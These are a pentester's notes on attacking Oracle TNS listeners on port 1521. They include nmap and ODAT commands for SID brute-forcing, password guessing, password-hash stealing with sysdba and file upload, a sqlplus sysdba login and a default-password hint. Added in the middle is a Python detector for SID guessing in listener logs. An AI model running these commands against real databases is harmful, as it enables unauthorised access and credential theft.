TNS
Transparent Network Substrate (TNS) is a protocol owned and developed by Oracle. It's mainly used to manage Oracle Databases.
It includes performance monitoring and analysis, error reporting, and logging tools. It supports a wide range of networking protocols such as IPX/SPX, TCP/IP, IPv6, and SSL/TLS. Communications are encrypted.
Port: 1521 (TCP)
The server-side service that listens for clients is called a listener. Its configuration determines which networking protocols are allowed.
TNS Pentester Notes
List databases using brute force:
$ sudo nmap IP -p 1521 -sV --script oracle-sid-brute
Oracle Database Attacking Tool (1.5k ⭐, ODAT, 2022) can be used to enumerate or exploit Oracle Databases.
$ sudo apt install odat
$ odat all -s IP
$ odat sidguesser -s IP
$ odat passwordguesser -s IP -d sid
$ odat passwordstealer -s IP -U username -P password -d sid --sysdba --get-passwords
$ odat utlfile [...] # file upload
The user may have sysdba access; try --sysdba.
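On the defensive side, the SID guessing performed by oracle-sid-brute and odat sidguesser above typically leaves a run of rejected connections (return code 12505) in the listener log. The following is an added example, not part of the original notes or of ODAT, that flags sources with many distinct unknown SIDs in a short window; the log layout, the sample lines, the thresholds and the function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed layout of a classic text listener.log connection entry:
# TIMESTAMP * CONNECT_DATA * PROTOCOL_INFO * EVENT * SID * RETURN_CODE
ENTRY = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* \(CONNECT_DATA=.*?\) \* "
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<src>[^)]+)\)\(PORT=\d+\)\) \* "
    r"establish \* (?P<sid>\S+) \* (?P<code>\d+)$")
UNKNOWN_SID = 12505  # TNS-12505: listener does not know the SID in the descriptor

def parse(lines):
    """Yield (timestamp, source, sid, return_code) for each connection entry."""
    for line in lines:
        m = ENTRY.match(line.strip())
        if m:  # continuation lines such as "TNS-12505: ..." do not match
            ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
            yield ts, m["src"], m["sid"], int(m["code"])

def sid_guessing_sources(lines, min_sids=5, window=timedelta(seconds=60)):
    """Map each source with >= min_sids distinct unknown SIDs in one window to those SIDs."""
    rejected = defaultdict(list)
    for ts, src, sid, code in parse(lines):
        if code == UNKNOWN_SID:
            rejected[src].append((ts, sid))
    flagged = {}
    for src, events in rejected.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:  # slide the window
                start += 1
            if len({sid for _, sid in events[start:end + 1]}) >= min_sids:
                flagged[src] = sorted({sid for _, sid in events})
                break
    return flagged

def _entry(time, sid, src, code):  # builds one constructed log line
    return (f"12-MAR-2024 {time} * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=)(HOST=c1)(USER=))) "
            f"* (ADDRESS=(PROTOCOL=tcp)(HOST={src})(PORT=40112)) * establish * {sid} * {code}")
# Constructed sample: one normal client with a single typo, one host sweeping SIDs.
SAMPLE_LOG = [_entry("10:15:01", "XE", "192.0.2.10", 0),
              _entry("10:15:30", "XEE", "192.0.2.10", 12505),
              "TNS-12505: TNS:listener does not currently know of SID given in connect descriptor"]
SAMPLE_LOG += [_entry(f"10:16:{i:02d}", sid, "198.51.100.7", 12505)
               for i, sid in enumerate(["ORCL", "PROD", "TEST", "DEV", "HR", "XE2"])]
if __name__ == "__main__":
    for src, sids in sid_guessing_sources(SAMPLE_LOG).items():
        print(f"possible SID guessing from {src}: {sids}")
```

Tune min_sids and window to the environment: a client with one mistyped SID stays below the threshold, while a dictionary sweep exceeds it within seconds.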
We can use Oracle SQLPlus to connect to the database:
$ sudo apt-get install oracle-instantclient-sqlplus
$ sudo updatedb
$ # if you got an error when running sqlplus
$ lpath=$(dirname `locate libsqlplus.so`) ; echo $lpath
$ sudo sh -c "echo $lpath > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
$ # connect
$ sqlplus username/password@IP/sid
$ sqlplus username/password@IP/sid as sysdba
The user may have sysdba access; try as sysdba.
To-do
Stuff that I found, but never read/used yet.
- tnsnames.ora (client-side info, list of db/services configurations)
- listener.ora (server-side config, listener config)
- $ORACLE_HOME/network/admin folder
- DBSNMP service has dbsnmp default password
- Finger service?
- PL/SQL Exclusion List (PlsqlExclusionList)
- Remove Listener Management?